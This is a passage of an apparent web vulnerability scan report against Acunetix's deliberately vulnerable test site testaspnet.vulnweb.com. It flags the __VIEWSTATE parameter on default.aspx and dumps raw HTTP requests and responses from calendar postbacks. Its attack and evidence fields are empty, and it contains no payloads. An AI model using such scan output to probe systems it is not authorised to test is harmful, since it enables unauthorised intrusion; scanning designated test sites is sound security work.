href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8351&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAktdAxNoIZGRk%2FqbaspsHCJ5yWwYNWzKlHXfgOk8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2F%2FZCSDQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAyM8BidaxrSktkqItLpnjfhAbWe2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:35 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAktdAxNoIZGRk/qbaspsHCJ5yWwYNWzKlHXfgOk8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL//ZCSDQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAyM8BidaxrSktkqItLpnjfhAbWe2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:White" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8339&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAndrSutoIZGRk4sH7RXgLdfh1FxeeA927dpHR%2Fcc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKAs7amDgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAy7wSkzPRGV0lRfBDDkvvz8oNEAk
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:57 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAndrSutoIZGRk4sH7RXgLdfh1FxeeA927dpHR/cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKAs7amDgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAy7wSkzPRGV0lRfBDDkvvz8oNEAk" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:White" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" 